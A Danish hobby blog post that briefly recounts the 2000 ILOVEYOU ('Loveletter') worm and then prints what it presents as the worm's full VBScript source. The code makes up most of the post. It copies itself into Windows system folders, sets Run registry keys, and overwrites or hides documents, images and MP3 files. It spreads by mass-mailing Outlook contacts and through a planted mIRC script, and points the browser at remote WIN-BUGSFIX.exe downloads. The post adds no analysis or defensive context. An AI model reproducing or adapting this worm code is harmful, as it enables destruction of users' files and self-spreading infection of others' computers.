Loveletter for u #1

[15.10.2017] [Nørderier/Projekt]

Sådan noget her er altid lidt farligt. For man ved ikke om google forevigt blacklister en. Men dengang i år 2000 blev der udsendt en virus kaldet I LOVE YOU eller loveletter eller sågar lovebug. Dette er koden til denne.

Programmet, eller scriptet, er skrevet i VBscript som er et scriptsprog beregnet til at køre små stykker kode, feks. ved opstart af computeren.

Scriptet har endelsen .txt.vbs - på windows skjules den sidste del normalt, derfor kommer scriptet til at se ud som en .txt fil. Hvis man kører det på en windowsmaskine, en sikkert ikke al for ny en, knalder det alle ens dokumenter, .mp3, .doc og den slags, det erstatter dem med en kopi af scriptet. Derefter sender det sig selv til alle venner i ens indbakke.

ILOVEYOU nåede at inficere 45 millioner computere og gjorde skade for mere end fem milliarder $.

På google.groups kan man se tråde der omhandler virussen fra de dage den gik amok: Google.Groups. En af de øverste er en analyse af virussen.

rem barok -loveletter(vbe) <i hate go to school></font> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines</font> On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WindowsScripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WindowsScripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script...mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWSwill affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTERcoming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><METANAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf&_ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;varhi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "setwri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

...

Index